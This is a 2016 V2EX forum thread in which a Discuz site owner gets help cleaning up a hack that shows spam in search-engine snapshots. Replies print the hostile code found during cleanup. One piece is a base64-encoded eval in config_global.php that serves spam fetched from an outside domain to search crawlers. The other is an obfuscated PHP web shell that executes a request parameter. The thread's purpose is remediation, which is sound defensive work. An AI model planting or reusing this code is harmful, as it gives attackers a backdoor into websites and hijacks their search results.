Myflos
V2EX  ›  问与答

万能的工单系统,快照网站被挂马了怎么破

  •  
  •   Myflos · Sep 11, 2016 · 2331 views
    This topic created in 3557 days ago, the information mentioned may be changed or developed.

    RT ,这些垃圾信息出现在网页快照的最上面,网页源码里没有找到,怎么处理是好,各位大侠请指点一二

    Supplement 1  ·  Sep 11, 2016
    这个 360 的快照
    ![]( )

    google 快照是正常的;

    网站程序是 discuz x3.2
    5 replies    2016-09-12 10:39:22 +08:00
    mrjoel
        1
    mrjoel  
       Sep 11, 2016
    发下网址吧
    mrjoel
        2
    mrjoel  
       Sep 11, 2016   ❤️ 1
    不方便发的话,你看下 360 快照里面有没有这些内容,百度和 google 都展示 js 内容,而 360 不展示。
    Myflos
        3
    Myflos  
    OP
       Sep 11, 2016
    @mrjoel 谢谢, 360 和百度都有, google 没有;网站是 discuz ,在 config_global.php ,找到如下代码

    @eval(base64_decode("CiRvcHRzID0gYXJyYXkoCiAgJ2h0dHAnPT5hcnJheSgKICAgICdtZXRob2QnPT4iR0VUIiwKICAgICd0aW1lb3V0Jz0+MTAsCiAgICkKKTsKJGNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoJG9wdHMpOwokZG9tYWluICA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOwoKaWYoaXNTcGlkZXIoKSl7CgkkY29udGVudD0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vbDQudHVhbmR1aTIzMTIuY29tL2xpbmsucGhwP2RvbWFpbj0nLiRkb21haW4uIiZzcGlkZXI9Ii5pc1NwaWRlcigpLiImcXVlcnk9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXSksZmFsc2UsJGNvbnRleHQpOwoJZWNobyAkY29udGVudDsKfQpmdW5jdGlvbiBpc1NwaWRlcigpewoJJGJvdHMgPSBhcnJheSgKCQknYmFpZHUnICAgICAgICA9PiAnYmFpZHVzcGlkZXInLAoJCSdzb2dvdScgICAgICAgID0+ICdzb2dvdScsCgkJJzM2MHNwaWRlcicgICAgICAgID0+ICdoYW9zb3VzcGlkZXInLAoJCSczNjBzcGlkZXInICAgICAgICA9PiAnMzYwc3BpZGVyJywKCQknYmluZ2JvdCcgICAgICAgID0+ICdiaW5nYm90JwoJKTsKICAgICR1c2VyQWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CiAgICBmb3JlYWNoICgkYm90cyBhcyAkayA9PiAkdil7CiAgICAgICAgaWYgKHN0cmlzdHIoJHVzZXJBZ2VudCwkdikpewogICAgICAgICAgICByZXR1cm4gJGs7CiAgICAgICAgfQogICAgfQogICAgcmV0dXJuIGZhbHNlOwp9"));
    $_config = array();
    UnisandK
        4
    UnisandK  
       Sep 12, 2016   ❤️ 1
    针对搜索引擎爬虫输出的

    if(isSpider()){
    $content= @file_get_contents('http://l4.tuandui2312.com/link.php?domain='.$domain."&spider=".isSpider()."&query=".base64_encode($_SERVER['QUERY_STRING']),false,$context);
    echo $content;
    }
    Myflos
        5
    Myflos  
    OP
       Sep 12, 2016
    @UnisandK 谢谢,在另外几个 php 文件内找到了这样的代码

    @$bSzrL= "s\x74r\x5fr\x65\x70lac\x65";
    @$VwissV= @$bSzrL('drApO','','adrApOrdrApOraydrApO_drApOmdrApOap');
    @$ZXNFh= @$bSzrL('DBCFzQ','','asseDBCFzQrDBCFzQt');
    @$VwissV(@$ZXNFh,(array)@$_REQUEST['uikmsaya']);

    都删掉了,希望可以清除干净吧。
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   5390 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 35ms · UTC 08:38 · PVG 16:38 · LAX 01:38 · JFK 04:38
    ♥ Do have faith in what you're doing.